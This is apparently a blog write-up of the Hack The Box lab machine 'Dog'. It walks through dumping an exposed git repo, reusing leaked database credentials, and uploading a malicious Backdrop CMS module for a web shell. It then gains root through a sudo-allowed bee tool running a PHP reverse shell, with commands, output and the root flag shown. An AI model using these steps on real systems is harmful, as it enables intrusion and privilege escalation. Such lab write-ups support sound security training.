Post

Dog - Easy - Linux

Dog - Easy - Linux

Nmap Scan

The port scan discovered SSH is active and an apache web server is hosting a website in addition to a git repo.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
# Nmap 7.95 scan initiated Sat Mar  8 15:44:31 2025 as: /usr/lib/nmap/nmap -sCV -p- -v -oN portscan.log 10.10.11.58
Nmap scan report for 10.10.11.58
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 3836E83A3E835A26D789DDA9E78C5510
|_http-title: Home | Dog
| http-git: 
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin 
| /comment/reply /filter/tips /node/add /search /user/register 
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar  8 15:44:54 2025 -- 1 IP address (1 host up) scanned in 23.65 seconds

Download Git Repo

git-dumper was used to download the repo for further investigation.

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~/hackthebox/dog/gitdump]
└─$ git-dumper http://10.10.11.58:80/.git/ .
[-] Testing http://10.10.11.58:80/.git/HEAD [200]
[-] Testing http://10.10.11.58:80/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://10.10.11.58:80/.git/ [200]
[-] Fetching http://10.10.11.58:80/.gitignore [404]
[-] http://10.10.11.58:80/.gitignore responded with status code 404
[-] Fetching http://10.10.11.58:80/.git/COMMIT_EDITMSG [200]
[-] Fetching http://10.10.11.58:80/.git/config [200]
[-] Fetching http://10.10.11.58:80/.git/HEAD [200]

Inspecting Git Repo

The repo contains a copy of files which are probably in production on the apache web server. The web application is called Backdrop CMS which is an open source project. The project can be found at the following link:

https://github.com/backdrop

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(kali㉿kali)-[~/hackthebox/dog/gitdump]
└─$ ls -la
total 92
drwxrwxr-x 8 kali kali  4096 Mar 10 00:38 .
drwxrwxr-x 6 kali kali  4096 Mar 10 00:38 ..
drwxrwxr-x 9 kali kali  4096 Mar 10 00:38 core
drwxrwxr-x 7 kali kali  4096 Mar 10 00:38 files
drwxrwxr-x 7 kali kali  4096 Mar 10 00:38 .git
-rwxrwxr-x 1 kali kali   578 Mar 10 00:38 index.php
drwxrwxr-x 2 kali kali  4096 Mar 10 00:38 layouts
-rwxrwxr-x 1 kali kali 18092 Mar 10 00:38 LICENSE.txt
-rwxrwxr-x 1 kali kali  5285 Mar 10 00:38 README.md
-rwxrwxr-x 1 kali kali  1198 Mar 10 00:38 robots.txt
-rwxrwxr-x 1 kali kali 21732 Mar 10 00:38 settings.php
drwxrwxr-x 2 kali kali  4096 Mar 10 00:38 sites
drwxrwxr-x 2 kali kali  4096 Mar 10 00:38 themes

SQL Configuration File

The following credentials were discovered within the settings.php file.

1
$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';

Username Discovery

The following username was discovered by grepping for the dog.htb domain.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali㉿kali)-[~/hackthebox/dog/gitdump]
└─$ grep -Ri 'dog.htb' -A5 -B5              
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json-    "update_url": "",
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json-    "update_not_implemented_url": "https://github.com/backdrop-ops/backdropcms.org/issues/22",
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json-    "update_max_attempts": 2,
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json-    "update_timeout": 30,
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json-    "update_emails": [
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:        "tiffany@dog.htb"
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json-    ],
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json-    "update_threshold": "all",
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json-    "update_requirement_type": 0,
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json-    "update_status": [],
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json-    "update_projects": []
--
.git/logs/refs/heads/master:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000	commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
--
.git/logs/HEAD:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000	commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases

Inspecting Port 80

Screenshot of the home page.

57adee927c760b62858b78fb61b999e5.png

Testing Credentials

It was possible to login to the web application with the discovered username and password.

06d84f4d1c8d4ec53d69726cc33abf87.png

Screenshot of the admin dashboard.

e32966bb18b1cfd205dc6ac5044f134f.png

Uploading Malicious Plug-in

After researching for known exploits related to Backdrop CMS I found the below POC on ExploitDB.

https://www.exploit-db.com/exploits/52021

The script generates a ZIP file which is then uploaded and installed as a plug-in.

1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/hackthebox/dog]
└─$ python3 exploit.py http://10.10.11.58
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to http://10.10.11.58/admin/modules/install and upload the shell.zip for Manual Installation.
Your shell address: http://10.10.11.58/modules/shell/shell.php

Manually Installing Plug-in (ZIP)

After attempting to upload the ZIP file an error message appeared advising ZIPs are not supported. The web application is expecting the plug-in to be contained within a tar archive.

ef61a61cf2e2dd865e67a1f38f6761fa.png

Manually Installing Plug-in (TAR)

To resolve the error message I added the plug-in files into a TAR archive. This resulted in a successful installation as seen below.

ddb72c39db4fdac6f42ea2516287e38c.png

Testing Malicious Plug-in

The web shell is working as expected as seen below.

836cce017c415492d3deaf0eef4cbcf7.png

Reverse Shell Obtained (www-data)

0f96fc2787d9330340bc6cefd3ddcfd7.png

ab024d40a6dfcccbbd6c2dffcbcaf504.png

5de31a3f1a7e1e6f7d1662a25c5da9ee.png

Password Reuse Test

After gaining a foothold on the system I dumped the SQL database using the credentials discovered in the settings.php file. The hashes were not cracking within 5 minutes so I assumed it was not the way forward. Instead I collected the list of users on the system who had shell access and tested known passwords. It was possible to login as johncusack using the SQL password.

1
2
3
4
5
6
www-data@dog:/var/www/html/modules/shell$ cat /etc/passwd | grep sh$
cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
jobert:x:1000:1000:jobert:/home/jobert:/bin/bash
johncusack:x:1001:1001:,,,:/home/johncusack:/bin/bash
www-data@dog:/var/www/html/modules/shell$ 

SSH access obtained as johncusack. User flag captured.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(kali㉿kali)-[~/hackthebox/dog]
└─$ ssh johncusack@10.10.11.58  
johncusack@10.10.11.58's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-208-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Tue 11 Mar 2025 12:20:31 AM UTC

  System load:           0.0
  Usage of /:            49.1% of 6.32GB
  Memory usage:          18%
  Swap usage:            0%
  Processes:             222
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.58
  IPv6 address for eth0: dead:beef::250:56ff:fe94:3fb0


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


johncusack@dog:~$ 

Escalating to Root - Bee Backdrop CMS Tool

After checking SUDO access johncusack could run the bee tool as root. The bee tool comes with Backdrop CMS and is used to manage it. It has several functions which are of interest.

1
2
3
4
5
6
7
8
johncusack@dog:/backdrop_tool/bee$ sudo -l
[sudo] password for johncusack: 
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee

The below snippet shows the functions of bee. The eval and php-script functions stand out the most as they could be used to get code execution as root.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
 ADVANCED
  db-query
   dbq
   Execute a query using db_query().

  eval
   ev, php-eval
   Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.

  php-script
   scr
   Execute an arbitrary PHP file after bootstrapping Backdrop.

  sql
   sqlc, sql-cli, db-cli
   Open an SQL command-line interface using Backdrop's database credentials.

I uploaded a PHP reverse shell and saved it in the /tmp directory. The below snippet shows the results of attempting to use the bee tool with sudo to execute the reverse shell. It failed due to a bootstrap error. I struggled to figure out why it kept failing and after researching bee I learned that it expects to be executed from the working directory of a Backdrop CMS install.

1
2
3
johncusack@dog:/backdrop_tool/bee$ sudo bee php-script /tmp/phpshell.php 

 ✘  The required bootstrap level for 'php-script' is not ready. 

After changing the current working directory to /var/www/html were Backdrop CMS was already installed the results were better. The error message no longer appeared and the reverse shell was executed with sudo.

1
2
3
4
5
6
johncusack@dog:/var/www/html$ sudo bee php-script /tmp/phpshell.php 
johncusack@dog:/var/www/html$ 
 ℹ  Notice: Undefined variable: daemon
in printit() (line 184 of /tmp/phpshell.php).

Successfully opened reverse shell to 10.10.14.16:9001

Root Shell Obtained

Call back was successful. Root flag captured.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿kali)-[~/hackthebox/dog]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.11.58] 34386
Linux dog 5.4.0-208-generic #228-Ubuntu SMP Fri Feb 7 19:41:33 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
 00:24:17 up  4:48,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
johncusa pts/0    10.10.14.16      00:20    1.00s  0.06s  0.06s -bash
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# cat /root/root.txt
8bb13980f98142b836028fc4e6f77d9a
# id
uid=0(root) gid=0(root) groups=0(root)
This post is licensed under CC BY 4.0 by the author.